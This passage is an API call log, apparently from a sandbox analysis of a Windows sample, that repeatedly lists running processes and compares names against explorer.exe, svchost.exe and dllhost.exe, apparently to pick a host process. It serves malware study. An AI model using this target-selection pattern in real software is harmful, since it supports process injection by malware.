lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0168.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0168.467] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.467] CloseHandle (hObject=0xd8) returned 1 [0168.467] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0168.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0168.468] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.468] CloseHandle (hObject=0xd8) returned 1 [0168.468] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0168.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0168.468] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.468] CloseHandle (hObject=0xd8) returned 1 [0168.468] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0168.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0168.469] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.469] CloseHandle (hObject=0xd8) returned 1 [0168.469] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0168.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0168.470] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.470] CloseHandle (hObject=0xd8) returned 1 [0168.470] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0168.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0168.470] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.470] CloseHandle (hObject=0xd8) returned 1 [0168.470] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0168.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0168.471] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.471] CloseHandle (hObject=0xd8) returned 1 [0168.471] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0168.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0168.471] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.471] CloseHandle (hObject=0xd8) returned 1 [0168.472] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0168.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0168.472] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.472] CloseHandle (hObject=0xd8) returned 1 [0168.472] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0168.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0168.473] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.473] CloseHandle (hObject=0xd8) returned 1 [0168.473] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0168.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0168.474] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.474] CloseHandle (hObject=0xd8) returned 1 [0168.474] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0168.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0168.474] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0168.475] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0168.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0168.476] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0168.476] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0168.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0168.477] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0168.477] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0168.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0168.478] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.478] CloseHandle (hObject=0xd8) returned 1 [0168.478] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0168.478] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0168.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0168.478] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.478] CloseHandle (hObject=0xd8) returned 1 [0168.478] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0168.478] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0168.478] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0168.478] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0168.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0168.479] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0168.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xd8 [0168.479] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.480] CloseHandle (hObject=0xd8) returned 1 [0168.480] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0168.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0168.480] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.480] CloseHandle (hObject=0xd8) returned 1 [0168.480] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0168.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0168.481] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.481] CloseHandle (hObject=0xd8) returned 1 [0168.481] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0168.481] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0168.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0168.481] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.481] CloseHandle (hObject=0xd8) returned 1 [0168.481] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0168.482] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0168.482] CloseHandle (hObject=0xd4) returned 1 [0168.482] Sleep (dwMilliseconds=0x3e8) [0169.646] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0169.648] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0169.649] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0169.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0169.650] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0169.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0169.650] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0169.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0169.651] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0169.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0169.651] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0169.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0169.652] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0169.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0169.652] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0169.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0169.653] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0169.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0169.653] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0169.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0169.654] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0169.654] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0169.655] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0169.655] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0169.656] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0169.656] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0169.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0169.657] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0169.657] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0169.658] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0169.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0169.658] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.659] CloseHandle (hObject=0xd8) returned 1 [0169.659] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0169.659] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0169.659] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0169.659] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0169.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0169.659] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0169.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0169.660] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.660] CloseHandle (hObject=0xd8) returned 1 [0169.660] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0169.660] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0169.660] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0169.660] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0169.660] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0169.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0169.661] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0169.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0169.662] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.662] CloseHandle (hObject=0xd8) returned 1 [0169.662] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0169.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0169.662] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.662] CloseHandle (hObject=0xd8) returned 1 [0169.662] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0169.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0169.663] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.663] CloseHandle (hObject=0xd8) returned 1 [0169.663] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0169.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0169.663] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.663] CloseHandle (hObject=0xd8) returned 1 [0169.663] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, 